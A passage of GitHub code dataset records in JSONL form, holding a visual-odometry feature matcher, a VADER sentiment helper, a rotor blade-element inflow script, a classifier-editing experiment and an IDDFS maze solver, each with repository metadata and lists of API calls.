self.max_cnt-50:\n\t\t\tself.forwframe_['keyPoint'], self.forwframe_['descriptor'], heatmap = self.SuperPoint_Ghostnet.run(self.new_frame, conf_thresh=0.01)\n\t\t\tkeyPoint_size = self.forwframe_['keyPoint'].shape[1]\n\t\t\tprint(\"next keypoint size is \", keyPoint_size)\n\n\t\t\n\n\t\tfor _ in range(keyPoint_size):\n\t\t\tif first_image_flag == True:\n\t\t\t\tself.forwframe_['PointID'].append(self.allfeature_cnt)\n\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\telse:\n\t\t\t\tself.forwframe_['PointID'].append(-1)\n\t\t\n\t\t##################### 开始处理匹配的特征点 ###############################\n\t\tif self.curframe_['keyPoint'].shape[1] > 0:\n\t\t\tstart_time = time()\n\t\t\tfeature_matches = self.tracker.nn_match_two_way( \n\t\t\t\t\t\t\t\t\tself.forwframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.curframe_['descriptor'], \n\t\t\t\t\t\t\t\t\tself.nn_thresh\n\t\t\t\t\t\t\t).astype(int)\n\t\t\tglobal match_time\n\t\t\tmatch_time += time()-start_time\n\t\t\tprint(\"match time is :\", match_time)\n\t\t\tprint(\"match size is :\", feature_matches.shape[1])\n\t\t\t######################## 保证匹配得到的lineID相同 #####################\n\t\t\tfor k in range(feature_matches.shape[1]):\n\t\t\t\tself.forwframe_['PointID'][feature_matches[0,k]] = self.curframe_['PointID'][feature_matches[1,k]]\n\n\t\t\t################### 将跟踪的点与没跟踪的点进行区分 #####################\n\t\t\tvecPoint_new = np.zeros((3,0))\n\t\t\tvecPoint_tracked = np.zeros((3,0))\n\t\t\tPointID_new = []\n\t\t\tPointID_tracked = []\n\t\t\tDescr_new = np.zeros((256,0))\n\t\t\tDescr_tracked = np.zeros((256,0))\n\n\t\t\tfor i in range(keyPoint_size):\n\t\t\t\tif self.forwframe_['PointID'][i] == -1 :\n\t\t\t\t\tself.forwframe_['PointID'][i] = self.allfeature_cnt\n\t\t\t\t\tself.allfeature_cnt = self.allfeature_cnt+1\n\t\t\t\t\tvecPoint_new = np.append(vecPoint_new, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_new.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_new = np.append(Descr_new, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, self.forwframe_['keyPoint'][:,i:i+1], axis=1)\n\t\t\t\t\tPointID_tracked.append(self.forwframe_['PointID'][i])\n\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, self.forwframe_['descriptor'][:,i:i+1], axis=1)\n\n\t\t\t########### 跟踪的点特征少于150了,那就补充新的点特征 ###############\n\n\t\t\tdiff_n = self.max_cnt - vecPoint_tracked.shape[1]\n\t\t\tif diff_n > 0:\n\t\t\t\tif vecPoint_new.shape[1] >= diff_n:\n\t\t\t\t\tfor k in range(diff_n):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\telse:\n\t\t\t\t\tfor k in range(vecPoint_new.shape[1]):\n\t\t\t\t\t\tvecPoint_tracked = np.append(vecPoint_tracked, vecPoint_new[:,k:k+1], axis=1)\n\t\t\t\t\t\tPointID_tracked.append(PointID_new[k])\n\t\t\t\t\t\tDescr_tracked = np.append(Descr_tracked, Descr_new[:,k:k+1], axis=1)\n\t\t\t\n\t\t\tself.forwframe_['keyPoint'] = vecPoint_tracked\n\t\t\tself.forwframe_['PointID'] = PointID_tracked\n\t\t\tself.forwframe_['descriptor'] = Descr_tracked\n\n\t\tif not self.no_display :\t\n\t\t\tout1 = (np.dstack((self.curframe_['image'], self.curframe_['image'], self.curframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.curframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.curframe_['keyPoint'][0,i]))-3, int(round(self.curframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.curframe_['keyPoint'][0,i]))+3, int(round(self.curframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.curframe_['keyPoint'][0,i])), int(round(self.curframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out1, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out1, pt2, 2, (255, 0, 0), -1)\n\t\t\t\t# cv2.putText(out1, str(self.curframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX , 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out1, 'pre_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tout2 = (np.dstack((self.forwframe_['image'], self.forwframe_['image'], self.forwframe_['image'])) * 255.).astype('uint8')\n\t\t\tfor i in range(len(self.forwframe_['PointID'])):\n\t\t\t\tpts1 = (int(round(self.forwframe_['keyPoint'][0,i]))-3, int(round(self.forwframe_['keyPoint'][1,i]))-3)\n\t\t\t\tpts2 = (int(round(self.forwframe_['keyPoint'][0,i]))+3, int(round(self.forwframe_['keyPoint'][1,i]))+3)\n\t\t\t\tpt2 = (int(round(self.forwframe_['keyPoint'][0,i])), int(round(self.forwframe_['keyPoint'][1,i])))\n\t\t\t\tcv2.rectangle(out2, pts1, pts2, (0,255,0))\n\t\t\t\tcv2.circle(out2, pt2, 2, (0, 0, 255), -1)\n\t\t\t\t# cv2.putText(out2, str(self.forwframe_['PointID'][i]), pt2, cv2.FONT_HERSHEY_SCRIPT_SIMPLEX, 0.3, (0, 0, 255), lineType=5)\n\t\t\tcv2.putText(out2, 'cur_image Point', (4, 12), cv2.FONT_HERSHEY_SIMPLEX, 0.4, (255, 255, 255), lineType=16)\n\n\t\t\tmin_conf = 0.001\n\t\t\theatmap[heatmap < min_conf] = min_conf\n\t\t\theatmap = -np.log(heatmap)\n\t\t\theatmap = (heatmap - heatmap.min()) / (heatmap.max() - heatmap.min() + .00001)\n\t\t\tout3 = myjet[np.round(np.clip(heatmap*10, 0, 9)).astype('int'), :]\n\t\t\tout3 = (out3*255).astype('uint8')\n\n\t\t\tout = np.hstack((out1, out2, out3))\n\t\t\tout = cv2.resize(out, (3*self.width, self.height))\n\n\t\t\tcv2.namedWindow(\"feature detector window\",1)\n\t\t\t# cv2.resizeWindow(\"feature detector window\", 640*3, 480)\n\t\t\tcv2.imshow('feature detector window',out)\n\t\t\tcv2.waitKey(1)\n\n\t\tself.curframe_ = copy.deepcopy(self.forwframe_)\n\n", "repo_name": "GuoFeng-X/CNN_VINS", "sub_path": "Visual-Front/feature_match.py", "file_name": "feature_match.py", "file_ext": "py", "file_size_in_byte": 8757, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 39, "dataset": "github-code", "pt": "53", "api": [{"api_name": "numpy.array", "line_number": 11, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 28, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 29, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 36, "usage_type": "call"}, {"api_name": "utils.feature_process.SuperPointFrontend_torch", "line_number": 56, "usage_type": "call"}, {"api_name": "utils.feature_process.PointTracker", "line_number": 63, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 67, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 68, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 69, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 89, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 90, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 98, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 99, "usage_type": "call"}, {"api_name": "time.time", "line_number": 105, "usage_type": "call"}, {"api_name": "time.time", "line_number": 109, "usage_type": "call"}, {"api_name": "time.time", "line_number": 131, "usage_type": "call"}, {"api_name": "time.time", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 146, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 147, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 150, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 151, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 159, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 161, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 163, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 171, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 173, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 176, "usage_type": "call"}, {"api_name": "numpy.append", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.dstack", "line_number": 185, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 190, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 191, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 193, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 193, "usage_type": "attribute"}, {"api_name": "numpy.dstack", "line_number": 195, "usage_type": "call"}, {"api_name": "cv2.rectangle", "line_number": 200, "usage_type": "call"}, {"api_name": "cv2.circle", "line_number": 201, "usage_type": "call"}, {"api_name": "cv2.putText", "line_number": 203, "usage_type": "call"}, {"api_name": "cv2.FONT_HERSHEY_SIMPLEX", "line_number": 203, "usage_type": "attribute"}, {"api_name": "numpy.log", "line_number": 207, "usage_type": "call"}, {"api_name": "numpy.round", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.clip", "line_number": 209, "usage_type": "call"}, {"api_name": "numpy.hstack", "line_number": 212, "usage_type": "call"}, {"api_name": "cv2.resize", "line_number": 213, "usage_type": "call"}, {"api_name": "cv2.namedWindow", "line_number": 215, "usage_type": "call"}, {"api_name": "cv2.imshow", "line_number": 217, "usage_type": "call"}, {"api_name": "cv2.waitKey", "line_number": 218, "usage_type": "call"}, {"api_name": "copy.deepcopy", "line_number": 220, "usage_type": "call"}]} +{"seq_id": "22903032501", "text": "from vaderSentiment.vaderSentiment import SentimentIntensityAnalyzer\nimport numpy as np\n\n\n####### Write your primary function here\ndef sentiment_scores(sentence):\n sent_keys = [\"Negative\", \"Neutral\", \"Positive\"]\n # Create a SentimentIntensityAnalyzer object.\n sid_obj = SentimentIntensityAnalyzer()\n\n # polarity_scores method of SentimentIntensityAnalyzer\n # object gives a sentiment dictionary.\n sentiment_dict = sid_obj.polarity_scores(sentence)\n sent_values = [x for x in sentiment_dict.values()]\n sent_values=sent_values[:3]\n # find the index of the max value\n\n index_max = np.argmax(sent_values)\n\n # decide sentiment as positive, negative and neutral\n final = sent_keys[index_max]\n # responses\n response1=f\"Overall sentiment is {final} with scores: {sentiment_dict}\"\n return response1\n", "repo_name": "plotly-dash-apps/603-movie-reviews-sentiment", "sub_path": "helpers/vader.py", "file_name": "vader.py", "file_ext": "py", "file_size_in_byte": 835, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "vaderSentiment.vaderSentiment.SentimentIntensityAnalyzer", "line_number": 9, "usage_type": "call"}, {"api_name": "numpy.argmax", "line_number": 18, "usage_type": "call"}]} +{"seq_id": "10659317267", "text": "## Minor Project code - 2\n## Coded by : G R Krishna Chand Avatar, Kumar Gaurav, Kashish Korotania\n## BEMT - Inflow Distribution and including the Tip Losses\nimport math\nimport numpy as np\nimport matplotlib.pyplot as plt\ndef prandtl_tip_loss(r,theta):\n global N_b, sol, cl_a, lam_c\n err = 1\n lam_old = (sol*cl_a/16)*(math.sqrt(1 + 32*theta*r/(sol*cl_a)) - 1)\n while(err > 1e-5):\n f = 0.5*N_b*(1-r)/lam_old \n\t\t# f_root = 0.5*N_b*r**2/(1-r)/lam_old\n F = (2/math.pi)*math.acos(math.exp(-f))\n # lam_new = (sol*cl_a/(16*F))*(math.sqrt(1 + 32*F*theta*r/(sol*cl_a)) - 1)\n lam_new = - (sol*cl_a/(16*F) - lam_c/2) + math.sqrt((sol*cl_a/16/F - lam_c/2)**2 + sol*cl_a*theta*r/8/F)\n err = abs(lam_new - lam_old)\n lam_old = lam_new\n return(lam_old) \n# Constant Parameters\nsol = 0.0578 #Solidity\ncl_a = 6.28 #Cl_a\nN_b = 4 #Number of Blades\nlam_c = 0.1 # Non-dimensional axial velocity\n#Initialising Parameters \nr = np.linspace(0,0.999999,500)\nN = len(r)\n# Computation for varying theta\ntheta_o = 10 # pitch angle at root\ntheta_tw = -2.5 # linear twist rate\nth = [] # Theta - pitch angle distribution\ndel_ct = [] # Coefficient of thrust\nlam = [] # Inflow distribution\nlam_no_tip = [] \ndel_ct_no_tip = [] \nfor i in range(N):\n theta = theta_o + theta_tw*r[i]\n th = th + [theta*math.pi/180]\nfor i in range(N):\n lam_t = prandtl_tip_loss(r[i],th[i])\n lam = lam + [lam_t]\n lam_no_tip_t = -(sol*cl_a/16 - lam_c/2) + math.sqrt((sol*cl_a/16 - lam_c/2)**2 + sol*cl_a*th[i]*r[i]/8)\n lam_no_tip = lam_no_tip + [lam_no_tip_t]\n del_ct_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_t*r[i])\n del_ct = del_ct + [del_ct_t]\n del_ct_no_tip_t = 0.5*(sol*cl_a)*(th[i]*r[i]**2 - lam_no_tip_t*r[i])\n del_ct_no_tip = del_ct_no_tip + [del_ct_no_tip_t]\n\n# Plotting \nplt.plot(r,lam,'b', label='BEMT+Vortex theory')\nplt.plot(r,lam_no_tip, 'm--', label='BEMT')\nplt.xlabel('Non-dimensional radius (r)')\nplt.ylabel('Inflow ratio (lambda)')\nplt.legend(loc=4)\nplt.xticks(np.arange(0,1.1,0.1))\n#plt.ylabel('Inflow ratio (lam)')\nplt.grid(True)\nplt.title('Inflow ratio distribution for theta_root = '+str(theta_o)+' degrees, linear twist rate = '+ str(theta_tw))\nplt.show()\n", "repo_name": "kcavatar/helicopters", "sub_path": "bemt/bemt_including_tip_loss_inflow.py", "file_name": "bemt_including_tip_loss_inflow.py", "file_ext": "py", "file_size_in_byte": 2257, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "math.sqrt", "line_number": 10, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 14, "usage_type": "attribute"}, {"api_name": "math.acos", "line_number": 14, "usage_type": "call"}, {"api_name": "math.exp", "line_number": 14, "usage_type": "call"}, {"api_name": "math.sqrt", "line_number": 16, "usage_type": "call"}, {"api_name": "numpy.linspace", "line_number": 26, "usage_type": "call"}, {"api_name": "math.pi", "line_number": 38, "usage_type": "attribute"}, {"api_name": "math.sqrt", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 50, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 50, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 51, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 51, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 52, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 52, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 53, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 53, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 54, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 54, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xticks", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 55, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 55, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.grid", "line_number": 57, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 57, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 58, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 58, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}]} +{"seq_id": "72557262247", "text": "import argparse\nimport collections\nimport torch\nimport numpy as np\nimport os, sys\n\nfrom test_CINIC10 import predict\nsys.path.insert(0, 'src')\nimport data_loader.data_loaders as module_data\nimport model.loss as module_loss\nimport model.metric as module_metric\nimport model.model as module_arch\nfrom trainer.editor import Editor\nfrom parse_config import ConfigParser\nfrom trainer import Trainer\nfrom utils import prepare_device, copy_file, read_lists, write_pickle\nfrom utils.edit_utils import prepare_edit_data\nfrom utils.analysis import knn\n\n\n# fix random seeds for reproducibility\nSEED = 123\ntorch.manual_seed(SEED)\ntorch.backends.cudnn.deterministic = True\ntorch.backends.cudnn.benchmark = False\nnp.random.seed(SEED)\n\ndef main(config):\n logger = config.get_logger('train')\n assert config.config['method'] == 'edit', \"Invalid method '{}'. Must be 'edit'\".format(config.config['method'])\n K = config.config['editor']['K'] # for KNN\n save_dir = str(config.save_dir)\n\n # build model architecture, then print to console\n config.config['arch'].update()\n layernum = config.config['layernum']\n model = config.init_obj('arch', module_arch, layernum=layernum)\n\n\n logger.info(\"Created {} model with {} trainable parameters\".format(config.config['arch']['type'], model.get_n_params()))\n if model.get_checkpoint_path() != \"\":\n logger.info(\"Restored weights from {}\".format(model.get_checkpoint_path()))\n else:\n logger.info(\"Training from scratch.\")\n\n # Create test data loader for metric calculations\n test_data_loader = config.init_obj('data_loader', module_data, split='test')\n logger.info(\"Created test data loader\")\n\n # Prepare for (multi-device) GPU training\n device, device_ids = prepare_device(config['n_gpu'])\n model = model.to(device)\n if len(device_ids) > 1:\n model = torch.nn.DataParallel(model, device_ids=device_ids)\n model.eval() # model should always be in eval() for editing\n\n # Get function handles for loss and metrics\n loss_fn = getattr(module_loss, config['loss'])\n metric_fns = [getattr(module_metric, met) for met in config['metrics']]\n\n # Run initial accuracy check on unedited model\n pre_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log pre-edit results and save to torch file\n logger.info(\"Metrics before editing: {}\".format(pre_edit_log))\n metric_save_path = os.path.join(save_dir, \"pre_edit_test_metrics.pth\")\n torch.save(pre_edit_log, metric_save_path)\n # write_pickle(pickle_path, pre_edit_log)\n\n # Prepare data for edit\n key_image_path = config.config['editor']['key_image_path']\n key_image_paths = read_lists(key_image_path)\n value_image_path = config.config['editor']['value_image_path']\n value_image_paths = read_lists(value_image_path)\n mask_path = config.config['editor']['mask_path']\n\n\n if mask_path != \"\":\n mask_paths = read_lists(mask_path)\n else:\n mask_paths = None\n\n logger.info(\"Key images: {}\".format(key_image_paths))\n logger.info(\"Value images: {}\".format(value_image_paths))\n logger.info(\"Masks: {}\".format(mask_paths))\n\n edit_data = prepare_edit_data(\n key_image_paths=key_image_paths,\n value_image_paths=value_image_paths,\n mask_paths=mask_paths,\n image_size=(32, 32))\n logger.info(\"Prepared data for editing\")\n\n if K > 0:\n # Provide dataloader to perform KNN\n val_paths_data_loader = config.init_obj(\n 'data_loader',\n module_data,\n split='valid',\n return_paths=True)\n logger.info(\"Created validation data loader for KNN calculations\")\n # Concatenate key and value images together\n # First is keys, second is values\n # labels of 'modified_imgs' and 'imgs' are misleading but from the original Editing a Classifier repo\n anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n pre_edit_knn_save_path = os.path.join(save_dir, \"pre_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=pre_edit_knn_save_path)\n logger.info(\"Saving pre-edit KNN results with K={} to {}\".format(K, pre_edit_knn_save_path))\n\n\n # Always use the dummy val_data_loader for covariance calculation\n covariance_data_loader_path = \"data/cinic-10-imagenet-dummy\"\n val_data_loader = module_data.CINIC10DataLoader(\n data_dir=covariance_data_loader_path,\n batch_size=256,\n shuffle=False,\n normalize=False,\n num_workers=8,\n split='valid')\n logger.info(\"Created dataloader for covariance matrix from {} ({})\".format(covariance_data_loader_path, 'valid'))\n\n\n\n # Set up editor\n editor_args = config.config['editor']['args']\n editor_args['arch'] = config.config['arch']['args']['type']\n\n editor = Editor(\n # model=model,\n val_data_loader=val_data_loader,\n **editor_args)\n\n # Create path for caching directory based on\n # (1) validation data dir\n # (2) context model -- architecture, layer number\n val_data_name = val_data_loader.get_data_name()\n model_arch = model.get_type()\n # layernum = editor.get_layernum()\n cache_dir = os.path.join('cache', val_data_name, \"{}-{}\".format(model_arch, layernum))\n logger.info(\"Looking for covariance matrix weights in {}\".format(cache_dir))\n # Perform edit\n editor.edit(\n edit_data=edit_data,\n model=model,\n cache_dir=cache_dir)\n\n model.save_model(save_path=os.path.join(config._save_dir, \"edited_model.pth\"))\n # Evaluate again on test set\n logger.info(\"Evaluating edited model on test set...\")\n post_edit_log = predict(\n data_loader=test_data_loader,\n model=model,\n loss_fn=loss_fn,\n metric_fns=metric_fns,\n device=device)\n\n # Log post-edit results and save to torch file\n logger.info(\"Metrics after editing: {}\".format(post_edit_log))\n metric_save_path = os.path.join(save_dir, \"post_edit_test_metrics.pth\")\n torch.save(post_edit_log, metric_save_path)\n # write_pickle(pickle_path, post_edit_log)\n\n\n # Perform post edit KNN analysis\n if K > 0:\n # # Concatenate key and value images together\n # anchor_images = torch.cat([edit_data['modified_imgs'], edit_data['imgs']], dim=0)\n post_edit_knn_save_path = os.path.join(save_dir, \"post_edit_{}-nn.pth\".format(K))\n logger.info(\"Performing KNN on validation dataset\")\n pre_edit_knn = knn(\n K=K,\n data_loader=val_paths_data_loader,\n model=model,\n anchor_image=anchor_images,\n data_types=['features', 'logits', 'images'],\n device=device,\n save_path=post_edit_knn_save_path)\n logger.info(\"Saving post-edit KNN results with K={} to {}\".format(K, post_edit_knn_save_path))\n\n\nif __name__ == '__main__':\n args = argparse.ArgumentParser(description='PyTorch Template')\n args.add_argument('-c', '--config', default=None, type=str,\n help='config file path (default: None)')\n args.add_argument('-r', '--resume', default=None, type=str,\n help='path to latest checkpoint (default: None)')\n args.add_argument('-d', '--device', default=None, type=str,\n help='indices of GPUs to enable (default: all)')\n\n # custom cli options to modify configuration from default values given in json file.\n CustomArgs = collections.namedtuple('CustomArgs', 'flags type target')\n options = [\n CustomArgs(['--lr', '--learning_rate'], type=float, target='optimizer;args;lr'),\n CustomArgs(['--bs', '--batch_size'], type=int, target='data_loader;args;batch_size'),\n CustomArgs(['--name'], type=str, target='name')\n ]\n parsed_args = args.parse_args()\n\n config = ConfigParser.from_args(args, options)\n main(config)\n", "repo_name": "allisonchen23/model-editing", "sub_path": "old_src/edit_knn.py", "file_name": "edit_knn.py", "file_ext": "py", "file_size_in_byte": 8243, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "sys.path.insert", "line_number": 8, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 8, "usage_type": "attribute"}, {"api_name": "torch.manual_seed", "line_number": 23, "usage_type": "call"}, {"api_name": "torch.backends", "line_number": 24, "usage_type": "attribute"}, {"api_name": "torch.backends", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.random.seed", "line_number": 26, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 26, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 37, "usage_type": "name"}, {"api_name": "model.model", "line_number": 37, "usage_type": "argument"}, {"api_name": "model.loss.get_n_params", "line_number": 40, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 40, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 41, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 41, "usage_type": "name"}, {"api_name": "model.loss.get_checkpoint_path", "line_number": 42, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 42, "usage_type": "name"}, {"api_name": "data_loader.data_loaders", "line_number": 47, "usage_type": "argument"}, {"api_name": "utils.prepare_device", "line_number": 51, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 52, "usage_type": "name"}, {"api_name": "model.loss.to", "line_number": 52, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 54, "usage_type": "name"}, {"api_name": "torch.nn.DataParallel", "line_number": 54, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 54, "usage_type": "attribute"}, {"api_name": "model.loss.eval", "line_number": 55, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 55, "usage_type": "name"}, {"api_name": "model.loss", "line_number": 58, "usage_type": "argument"}, {"api_name": "model.metric", "line_number": 59, "usage_type": "argument"}, {"api_name": "test_CINIC10.predict", "line_number": 62, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 64, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 72, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 77, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 79, "usage_type": "call"}, {"api_name": "utils.read_lists", "line_number": 84, "usage_type": "call"}, {"api_name": "utils.edit_utils.prepare_edit_data", "line_number": 92, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 103, "usage_type": "argument"}, {"api_name": "torch.cat", "line_number": 110, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 111, "usage_type": "call"}, {"api_name": "os.path", "line_number": 111, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 113, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 116, "usage_type": "name"}, {"api_name": "data_loader.data_loaders.CINIC10DataLoader", "line_number": 126, "usage_type": "call"}, {"api_name": "data_loader.data_loaders", "line_number": 126, "usage_type": "name"}, {"api_name": "trainer.editor.Editor", "line_number": 141, "usage_type": "call"}, {"api_name": "model.loss.get_type", "line_number": 150, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 150, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 152, "usage_type": "call"}, {"api_name": "os.path", "line_number": 152, "usage_type": "attribute"}, {"api_name": "model.loss", "line_number": 157, "usage_type": "name"}, {"api_name": "model.loss.save_model", "line_number": 160, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 160, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "test_CINIC10.predict", "line_number": 163, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 165, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "torch.save", "line_number": 173, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 181, "usage_type": "call"}, {"api_name": "os.path", "line_number": 181, "usage_type": "attribute"}, {"api_name": "utils.analysis.knn", "line_number": 183, "usage_type": "call"}, {"api_name": "model.loss", "line_number": 186, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 195, "usage_type": "call"}, {"api_name": "collections.namedtuple", "line_number": 204, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser.from_args", "line_number": 212, "usage_type": "call"}, {"api_name": "parse_config.ConfigParser", "line_number": 212, "usage_type": "name"}]} +{"seq_id": "11764670549", "text": "from Maze import Maze\nfrom datetime import datetime\nfrom queue import heappop, heappush, deque\n\nclass MazeSolverIDDFS():\n startT = datetime.now()\n def __init__(self,maze):\n self.maze = maze\n\n\n def IDDFS(self):\n \n start = self.maze.getCell(0, 0)\n goal = self.maze.getCell(self.maze.size-1, self.maze.size-1)\n prev_iter_visited, depth = [], 0\n while True:\n traced_path, visited = self.DLS(start, goal, depth)\n if traced_path or len(visited) == len(prev_iter_visited): return traced_path\n else: prev_iter_visited = visited; depth += 1\n \n\n def DLS(self, start, goal, limit=-1):\n \n found, fringe, visited, came_from = False, deque([(0, start)]), set([start]), {start: None}\n while not found and len(fringe):\n depth, current = fringe.pop()\n if current == goal: found = True; break\n if limit == -1 or depth < limit:\n for node in current.edges.values():\n if node not in visited:\n visited.add(node); fringe.append((depth + 1, node))\n came_from[node] = current\n if found: print(\"IDDFS total time run \",datetime.now()-self.startT,\" total expanded cells:\",len(visited)+1,\" optimum path lenght: \",self.maze.optimum); return came_from, visited\n else: return None, visited\n", "repo_name": "n6parmak/Maze-Generator-Solver", "sub_path": "MazeSolverIDDFS.py", "file_name": "MazeSolverIDDFS.py", "file_ext": "py", "file_size_in_byte": 1403, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "datetime.datetime.now", "line_number": 6, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 6, "usage_type": "name"}, {"api_name": "queue.deque", "line_number": 24, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "name"}]} +{"seq_id": "24410508495", "text": "import torch\nimport torch.nn as nn\nimport torch.optim as optim\nimport torchvision.transforms as transforms\nimport os\nimport 